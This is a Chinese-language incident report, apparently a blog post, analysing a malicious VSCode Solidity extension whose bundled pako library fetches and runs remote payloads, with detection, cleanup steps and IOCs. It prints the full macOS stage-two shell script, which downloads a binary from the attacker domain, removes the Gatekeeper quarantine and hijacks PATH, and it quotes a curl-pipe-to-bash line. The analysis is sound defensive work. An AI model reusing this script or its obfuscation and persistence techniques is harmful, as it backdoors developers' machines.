class="table-wrapper-paragraph"><table> <thead> <tr> <th>技术</th> <th>目的</th> <th>示例</th> </tr> </thead> <tbody> <tr> <td>Unicode 转义</td> <td>隐藏关键字符串</td> <td> <code>\u0063\u0068\u0069\u006C\u0064_\u0070\u0072\u006F\u0063\u0065\u0073\u0073</code> = <code>child_process</code> </td> </tr> <tr> <td>异或运算</td> <td>混淆数字常量</td> <td> <code>965581^965578</code> = <code>7</code> </td> </tr> <tr> <td>字符串反转</td> <td>隐藏平台名称</td> <td> <code>"niwrad".split("").reverse().join("")</code> = <code>"darwin"</code> </td> </tr> <tr> <td>布尔值混淆</td> <td>隐藏 true 值</td> <td> <code>!![]</code> = <code>true</code> </td> </tr> </tbody> </table></div> <h3> 4. 执行流程 </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>VSCode 启动 ↓ 加载扩展 (onStartupFinished) ↓ require('pako') ↓ 执行 pako/index.js ↓ 检测操作系统 ↓ ┌─────────────┬─────────────┐ │ Windows │ macOS │ └─────────────┴─────────────┘ ↓ ↓ 下载 calc.bat 下载 doc.sh ↓ ↓ 后台执行 管道执行 bash ↓ ↓ 持久化 持久化 </code></pre> </div> <h2> macOS 攻击载荷分析 </h2> <h3> 下载的恶意脚本 (doc.sh) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c">#!/bin/bash</span> <span class="nb">mkdir</span> <span class="nt">-p</span> ~/.local/bin <span class="o">&amp;&amp;</span> <span class="se">\</span> curl <span class="nt">-sL</span> https://cdn.rraghh.com/gt/doc <span class="nt">-o</span> ~/.local/bin/updater <span class="o">&amp;&amp;</span> <span class="se">\</span> <span class="nb">chmod</span> +x ~/.local/bin/updater <span class="o">&amp;&amp;</span> <span class="se">\</span> xattr <span class="nt">-d</span> com.apple.quarantine ~/.local/bin/updater 2&gt;/dev/null <span class="o">||</span> <span class="nb">true</span> <span class="o">&amp;&amp;</span> <span class="se">\</span> xattr <span class="nt">-c</span> ~/.local/bin/updater 2&gt;/dev/null <span class="o">||</span> <span class="nb">true</span> <span class="o">&amp;&amp;</span> <span class="se">\</span> <span class="nb">echo</span> <span class="s1">'export PATH="$HOME/.local/bin:$PATH"'</span> <span class="o">&gt;&gt;</span> ~/.zshrc 2&gt;/dev/null <span class="o">&amp;&amp;</span> <span class="se">\</span> <span class="nb">echo</span> <span class="s1">'export PATH="$HOME/.local/bin:$PATH"'</span> <span class="o">&gt;&gt;</span> ~/.bash_profile 2&gt;/dev/null <span class="o">&amp;&amp;</span> <span class="se">\</span> ~/.local/bin/updater </code></pre> </div> <h3> 攻击步骤解析 </h3> <ol> <li> <strong>创建隐藏目录</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="nb">mkdir</span> <span class="nt">-p</span> ~/.local/bin </code></pre> </div> <p>在用户目录下创建 <code>.local/bin</code> 目录(隐藏目录)</p> <ol> <li> <strong>下载后门程序</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> curl <span class="nt">-sL</span> https://cdn.rraghh.com/gt/doc <span class="nt">-o</span> ~/.local/bin/updater </code></pre> </div> <ul> <li> <code>-s</code>: 静默模式,不显示进度</li> <li> <code>-L</code>: 跟随重定向</li> </ul> <ol> <li> <strong>赋予执行权限</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="nb">chmod</span> +x ~/.local/bin/updater </code></pre> </div> <ol> <li> <strong>绕过 macOS Gatekeeper</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> xattr <span class="nt">-d</span> com.apple.quarantine ~/.local/bin/updater xattr <span class="nt">-c</span> ~/.local/bin/updater </code></pre> </div> <p>移除隔离属性,避免 macOS 安全警告</p> <ol> <li> <strong>劫持 PATH 环境变量</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="nb">echo</span> <span class="s1">'export PATH="$HOME/.local/bin:$PATH"'</span> <span class="o">&gt;&gt;</span> ~/.zshrc <span class="nb">echo</span> <span class="s1">'export PATH="$HOME/.local/bin:$PATH"'</span> <span class="o">&gt;&gt;</span> ~/.bash_profile </code></pre> </div> <p>将恶意目录添加到 PATH 最前面,实现命令劫持</p> <ol> <li> <strong>立即执行后门</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> ~/.local/bin/updater </code></pre> </div> <h2> 持久化机制 </h2> <h3> 1. PATH 劫持 </h3> <p>通过修改 shell 配置文件,将 <code>~/.local/bin</code> 添加到 PATH 最前面:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># ~/.zshrc 和 ~/.bash_profile 被添加</span> <span class="nb">export </span><span class="nv">PATH</span><span class="o">=</span><span class="s2">"</span><span class="nv">$HOME</span><span class="s2">/.local/bin:</span><span class="nv">$PATH</span><span class="s2">"</span> </code></pre> </div> <p><strong>危害</strong>:</p> <ul> <li>可以劫持系统命令(如 <code>ls</code>, <code>cd</code>, <code>git</code> 等)</li> <li>每次打开终端都会优先执行恶意目录中的程序</li> <li>难以被用户察觉</li> </ul> <h3> 2. 可能的 LaunchAgent </h3> <p>虽然本次分析未发现,但类似攻击通常会创建:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plist"><code><span class="err">~</span><span class="l">/Library/LaunchAgents/com.</span><span class="err">*</span><span class="l">.plist</span><span class="w"> </span></code></pre> </div> <h2> 网络基础设施 </h2> <h3> C&amp;C 服务器 </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>域名</th> <th>用途</th> <th>状态</th> </tr> </thead> <tbody> <tr> <td><code>rraghh.com</code></td> <td>Windows 载荷分发</td> <td>活跃</td> </tr> <tr> <td><code>cdn.rraghh.com</code></td> <td>macOS 载荷分发</td> <td>活跃</td> </tr> </tbody> </table></div> <h3> 下载的文件 </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>平台</th> <th>URL</th> <th>本地路径</th> </tr> </thead> <tbody> <tr> <td>Windows</td> <td><code>https://rraghh.com/gt/calc.bat</code></td> <td><code>%TEMP%\1.bat</code></td> </tr> <tr> <td>macOS</td> <td><code>https://cdn.rraghh.com/gt/doc.sh</code></td> <td>管道执行</td> </tr> <tr> <td>macOS</td> <td><code>https://cdn.rraghh.com/gt/doc</code></td> <td><code>~/.local/bin/updater</code></td> </tr> </tbody> </table></div> <h2> 技术特征 </h2> <h3> 进程隐藏技术 </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="p">{</span> <span class="dl">'</span><span class="s1">detached</span><span class="dl">'</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="c1">// 分离父进程</span> <span class="dl">'</span><span class="s1">stdio</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span> <span class="c1">// 忽略标准输入输出</span> <span class="p">}</span> <span class="p">.</span><span class="nf">unref</span><span class="p">();</span> <span class="c1">// 解除引用,允许父进程退出</span> </code></pre> </div> <p><strong>效果</strong>:</p> <ul> <li>恶意进程在后台静默运行</li> <li>不会阻塞 VSCode 启动</li> <li>用户无法从 VSCode 进程树中发现</li> </ul> <h3> 反检测技术 </h3> <ol> <li> <strong>代码混淆</strong>:Unicode 转义 + 异或运算</li> <li> <strong>字符串加密</strong>:关键字符串全部编码</li> <li> <strong>延迟执行</strong>:在扩展加载时才触发</li> <li> <strong>无文件落地</strong>:macOS 版本直接管道执行</li> </ol> <h2> 文件哈希值 </h2> <h3> 恶意文件 </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>SHA256(extension/node_modules/pako/index.js) = fcd398abc51fd16e8bc93ef8d88a23d7dec28081b6dfce4b933020322a610508 </code></pre> </div> <h3> 干净文件(对比) </h3> <p>正常的 pako 1.0.11 版本 index.js:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="dl">'</span><span class="s1">use strict</span><span class="dl">'</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">assign</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">./lib/utils/common</span><span class="dl">'</span><span class="p">).</span><span class="nx">assign</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">deflate</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">./lib/deflate</span><span class="dl">'</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">inflate</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">./lib/inflate</span><span class="dl">'</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">constants</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">./lib/zlib/constants</span><span class="dl">'</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">pako</span> <span class="o">=</span> <span class="p">{};</span> <span class="nf">assign</span><span class="p">(</span><span class="nx">pako</span><span class="p">,</span> <span class="nx">deflate</span><span class="p">,</span> <span class="nx">inflate</span><span class="p">,</span> <span class="nx">constants</span><span class="p">);</span> <span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="nx">pako</span><span class="p">;</span> </code></pre> </div> <h2> 检测方法 </h2> <h3> 1. 文件完整性检查 </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 检查 pako/index.js 是否被篡改</span> <span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"child_process</span><span class="se">\|</span><span class="s2">rraghh</span><span class="se">\|</span><span class="s2">curl.*bash"</span> ~/.vscode/extensions/<span class="k">*</span>/node_modules/pako/index.js </code></pre> </div> <h3> 2. 进程监控 </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># macOS</span> ps aux | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"updater|</span><span class="se">\.</span><span class="s2">local/bin/apple"</span> <span class="c"># 检查网络连接</span> lsof <span class="nt">-i</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"rraghh"</span> </code></pre> </div> <h3> 3. 文件系统检查 </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 检查恶意文件</span> <span class="nb">ls</span> <span class="nt">-la</span> ~/.local/bin/ <span class="nb">cat</span> ~/.local/bin/updater 2&gt;/dev/null <span class="c"># 检查 shell 配置</span> <span class="nb">grep</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">local/bin"</span> ~/.zshrc ~/.bash_profile </code></pre> </div> <h3> 4. VSCode 扩展审计 </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 列出所有已安装扩展</span> code <span class="nt">--list-extensions</span> <span class="nt">--show-versions</span> <span class="c"># 检查可疑扩展</span> <span class="nb">ls</span> <span class="nt">-la</span> ~/.vscode/extensions/ | <span class="nb">grep</span> <span class="nt">-i</span> <span class="s2">"iolite</span><span class="se">\|</span><span class="s2">solidity-macos"</span> </code></pre> </div> <h2> 清除方法 </h2> <h3> 立即响应步骤 </h3> <h4> 1. 终止恶意进程 </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 查找并终止</span> pkill <span class="nt">-9</span> <span class="nt">-f</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">local/bin/apple"</span> pkill <span class="nt">-9</span> <span class="nt">-f</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">local/bin/updater"</span> pkill <span class="nt">-9</span> <span class="nt">-f</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">local/bin/.system_updater"</span> </code></pre> </div> <h4> 2. 删除恶意文件 </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 删除后门程序</span> <span class="nb">rm</span> <span class="nt">-f</span> ~/.local/bin/apple <span class="nb">rm</span> <span class="nt">-f</span> ~/.local/bin/updater <span class="nb">rm</span> <span class="nt">-f</span> ~/.local/bin/.system_updater <span class="c"># 如果整个目录只有恶意文件</span> <span class="nb">rm</span> <span class="nt">-rf</span> ~/.local/bin/ </code></pre> </div> <h4> 3. 清理 shell 配置 </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 备份配置文件</span> <span class="nb">cp</span> ~/.zshrc ~/.zshrc.backup <span class="nb">cp</span> ~/.bash_profile ~/.bash_profile.backup <span class="c"># 手动编辑,删除包含 .local/bin 的 PATH 行</span> vim ~/.zshrc vim ~/.bash_profile <span class="c"># 或使用 sed 自动删除</span> <span class="nb">sed</span> <span class="nt">-i</span>.bak <span class="s1">'/\.local\/bin/d'</span> ~/.zshrc <span class="nb">sed</span> <span class="nt">-i</span>.bak <span class="s1">'/\.local\/bin/d'</span> ~/.bash_profile </code></pre> </div> <h4> 4. 卸载恶意扩展 </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 通过 VSCode 命令行</span> code <span class="nt">--uninstall-extension</span> iolitelabs.solidity-macos <span class="c"># 手动删除</span> <span class="nb">rm</span> <span class="nt">-rf</span> ~/.vscode/extensions/iolitelabs.solidity-macos-<span class="k">*</span> <span class="c"># 删除缓存的 VSIX</span> <span class="nb">rm</span> <span class="nt">-f</span> ~/Library/Application<span class="se">\ </span>Support/Code/CachedExtensionVSIXs/iolitelabs.solidity-macos-<span class="k">*</span> </code></pre> </div> <h4> 5. 检查 LaunchAgents </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 查找可疑的自动启动项</span> <span class="nb">ls</span> <span class="nt">-la</span> ~/Library/LaunchAgents/ <span class="nb">ls</span> <span class="nt">-la</span> /Library/LaunchAgents/ <span class="nb">ls</span> <span class="nt">-la</span> /Library/LaunchDaemons/ <span class="c"># 检查是否有相关项</span> launchctl list | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"updater|apple|rraghh"</span> </code></pre> </div> <h4> 6. 检查 crontab </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 查看定时任务</span> crontab <span class="nt">-l</span> <span class="c"># 如果发现可疑任务,编辑删除</span> crontab <span class="nt">-e</span> </code></pre> </div> <h4> 7. 重启 shell </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 重新加载配置</span> <span class="nb">source</span> ~/.zshrc <span class="c"># 或重启终端</span> </code></pre> </div> <h2> 深度清理(可选) </h2> <h3> 1. 网络流量分析 </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 检查是否有持续的恶意连接</span> <span class="nb">sudo </span>tcpdump <span class="nt">-i</span> any host rraghh.com or host cdn.rraghh.com </code></pre> </div> <h3> 2. 文件系统全盘扫描 </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 搜索所有相关文件</span> <span class="nb">sudo </span>find / <span class="nt">-name</span> <span class="s2">"*updater*"</span> <span class="nt">-o</span> <span class="nt">-name</span> <span class="s2">"*rraghh*"</span> 2&gt;/dev/null <span class="c"># 搜索最近修改的可执行文件</span> find ~ <span class="nt">-type</span> f <span class="nt">-perm</span> +111 <span class="nt">-mtime</span> <span class="nt">-7</span> </code></pre> </div> <h3> 3. 浏览器扩展检查 </h3> <p>某些恶意软件会同时感染浏览器,检查:</p> <ul> <li>Chrome: <code>chrome://extensions/</code> </li> <li>Safari: 偏好设置 → 扩展</li> </ul> <h2> 防护建议 </h2> <h3> 对于开发者 </h3> <ol> <li> <p><strong>只从官方市场安装扩展</strong></p> <ul> <li>VSCode Marketplace: <a href="https://marketplace.visualstudio.com/" rel="noopener noreferrer">https://marketplace.visualstudio.com/</a> </li> <li>避免从第三方网站下载 <code>.vsix</code> 文件</li> </ul> </li> <li> <p><strong>审查扩展权限</strong></p> <ul> <li>查看扩展的 <code>package.json</code> 中的 <code>activationEvents</code> </li> <li>警惕 <code>onStartupFinished</code> 等自动激活事件</li> </ul> </li> <li><p><strong>定期审计已安装扩展</strong><br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> code <span class="nt">--list-extensions</span> <span class="nt">--show-versions</span> <span class="o">&gt;</span> extensions.txt </code></pre> </div> <ol> <li> <p><strong>使用 SRI (Subresource Integrity)</strong></p> <ul> <li>验证依赖包的完整性</li> <li>使用 <code>package-lock.json</code> 锁定版本</li> </ul> </li> <li><p><strong>启用 VSCode 安全功能</strong><br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"extensions.autoCheckUpdates"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"extensions.autoUpdate"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h3> 对于企业 </h3> <ol> <li><strong>建立扩展白名单制度</strong></li> <li><strong>使用私有扩展市场</strong></li> <li><strong>部署 EDR (Endpoint Detection and Response)</strong></li> <li> <strong>网络层面阻断恶意域名</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> rraghh.com cdn.rraghh.com *.rraghh.com </code></pre> </div> <ol> <li> <strong>文件完整性监控 (FIM)</strong> <ul> <li>监控 <code>~/.local/bin/</code> 目录</li> <li>监控 shell 配置文件变化</li> </ul> </li> </ol> <h2> IOC (Indicators of Compromise) </h2> <h3> 域名 </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>rraghh.com cdn.rraghh.com </code></pre> </div> <h3> URL </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>https://rraghh.com/gt/calc.bat https://cdn.rraghh.com/gt/doc.sh https://cdn.rraghh.com/gt/doc </code></pre> </div> <h3> 文件路径 </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>~/.local/bin/updater ~/.local/bin/apple ~/.local/bin/.system_updater %TEMP%\1.bat </code></pre> </div> <h3> 文件哈希 </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>SHA256(pako/index.js) = fcd398abc51fd16e8bc93ef8d88a23d7dec28081b6dfce4b933020322a610508 </code></pre> </div> <h3> 进程特征 </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>进程名: updater, apple, .system_updater 命令行: curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash </code></pre> </div> <h3> 网络特征 </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>目标域名: rraghh.com, cdn.rraghh.com 协议: HTTPS User-Agent: curl/* </code></pre> </div> <h2> 时间线 </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>时间</th> <th>事件</th> </tr> </thead> <tbody> <tr> <td>2026-03-25</td> <td>恶意扩展被打包 (VSIX 文件时间戳)</td> </tr> <tr> <td>2026-03-26 16:27</td> <td>扩展文件被解压到本地</td> </tr> <tr> <td>2026-03-27</td> <td>用户安装扩展</td> </tr> <tr> <td>2026-03-28 02:33</td> <td>发现可疑进程 <code>apple</code> (PID 3009)</td> </tr> <tr> <td>2026-03-28 03:00+</td> <td>开始分析和清理</td> </tr> </tbody> </table></div> <h2> 攻击归因 </h2> <h3> 攻击者特征 </h3> <ol> <li> <p><strong>技术水平</strong>:中高级</p> <ul> <li>熟悉 JavaScript 混淆技术</li> <li>了解 VSCode 扩展机制</li> <li>掌握跨平台脚本编写</li> </ul> </li> <li> <p><strong>攻击目标</strong>:</p> <ul> <li>区块链/Web3 开发者(Solidity 开发者)</li> <li>可能窃取加密货币钱包私钥</li> <li>可能进行供应链攻击</li> </ul> </li> <li> <p><strong>基础设施</strong>:</p> <ul> <li>使用 CDN 分发载荷</li> <li>域名注册信息隐藏</li> <li>可能使用云服务托管</li> </ul> </li> </ol> <h3> 相似攻击案例 </h3> <ul> <li> <strong>event-stream 事件</strong> (2018):npm 包被注入恶意代码窃取比特币</li> <li> <strong>ua-parser-js 投毒</strong> (2021):npm 包被劫持植入挖矿木马</li> <li> <strong>VSCode 扩展 "prettiest"</strong> (2023):伪装成代码格式化工具的后门</li> </ul> <h2> 技术总结 </h2> <h3> 攻击向量 </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>供应链攻击 (Supply Chain Attack) ↓ 依赖混淆 (Dependency Confusion) ↓ 代码注入 (Code Injection) ↓ 后门植入 (Backdoor Installation) ↓ 持久化 (Persistence) </code></pre> </div> <h3> MITRE ATT&amp;CK 映射 </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>战术</th> <th>技术</th> <th>ID</th> </tr> </thead> <tbody> <tr> <td>Initial Access</td> <td>Supply Chain Compromise</td> <td>T1195.002</td> </tr> <tr> <td>Execution</td> <td>Command and Scripting Interpreter</td> <td>T1059.004</td> </tr> <tr> <td>Persistence</td> <td>Path Interception</td> <td>T1574.007</td> </tr> <tr> <td>Defense Evasion</td> <td>Obfuscated Files or Information</td> <td>T1027</td> </tr> <tr> <td>Defense Evasion</td> <td>Subvert Trust Controls</td> <td>T1553.001</td> </tr> </tbody> </table></div> <h2> 参考资料 </h2> <ol> <li> <p><strong>VSCode 扩展安全指南</strong></p> <ul> <li><a href="https://code.visualstudio.com/api/references/extension-manifest" rel="noopener noreferrer">https://code.visualstudio.com/api/references/extension-manifest</a></li> </ul> </li> <li> <p><strong>npm 包安全最佳实践</strong></p> <ul> <li><a href="https://docs.npmjs.com/packages-and-modules/securing-your-code" rel="noopener noreferrer">https://docs.npmjs.com/packages-and-modules/securing-your-code</a></li> </ul> </li> <li> <p><strong>macOS 安全机制</strong></p> <ul> <li>Gatekeeper: <a href="https://support.apple.com/en-us/HT202491" rel="noopener noreferrer">https://support.apple.com/en-us/HT202491</a> </li> <li>XProtect: <a href="https://support.apple.com/guide/security/" rel="noopener noreferrer">https://support.apple.com/guide/security/</a> </li> </ul> </li> <li> <p><strong>MITRE ATT&amp;CK Framework</strong></p> <ul> <li><a href="https://attack.mitre.org/" rel="noopener noreferrer">https://attack.mitre.org/</a></li> </ul> </li> </ol> <h2> 联系方式 </h2> <p>如果您发现类似的恶意扩展,请报告给:</p> <ul> <li>VSCode 安全团队: <a href="https://github.com/microsoft/vscode/security" rel="noopener noreferrer">https://github.com/microsoft/vscode/security</a> </li> <li>npm 安全团队: <a href="mailto:security@npmjs.com">security@npmjs.com</a> </li> </ul> <h2> 免责声明 </h2> <p>本报告仅用于安全研究和教育目的。请勿将本报告中的技术用于非法用途。作者不对任何滥用行为负责。</p> <p><strong>报告生成时间</strong>: 2026-03-28<br> <strong>分析工具</strong>: Claude Code, VSCode, macOS 系统工具<br> <strong>报告版本</strong>: 1.0</p> cybersecurity security solidity vscode